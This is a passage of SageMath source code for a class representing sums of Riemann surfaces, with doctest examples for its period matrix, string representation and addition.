sage: S = RiemannSurfaceSum([S1,S2])
sage: S.riemann_matrix() == S1.riemann_matrix().block_sum(S2.riemann_matrix())
True
"""
return self.tau
def __repr__(self):
r"""
Return string describing Riemann surface sum.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface, RiemannSurfaceSum
sage: R.<x,y>=QQ[]
sage: S1 = RiemannSurface(y^2-x^3-x-1)
sage: S2 = RiemannSurface(y^2-x^3-x-5)
sage: RiemannSurfaceSum([S1,S2])
Riemann surface sum with period lattice of rank 4
"""
return "Riemann surface sum with period lattice of rank " + repr(2*self.genus)
def __add__(self,other):
r"""
Return the disjoint union of the Riemann surface and the other argument.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface, RiemannSurfaceSum
sage: R.<x,y>=QQ[]
sage: S1 = RiemannSurface(y^2-x^3-x-1)
sage: S1+S1+S1
Riemann surface sum with period lattice of rank 6
"""
return RiemannSurfaceSum([self, other])
| 39.610619 | 123 | 0.575983 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.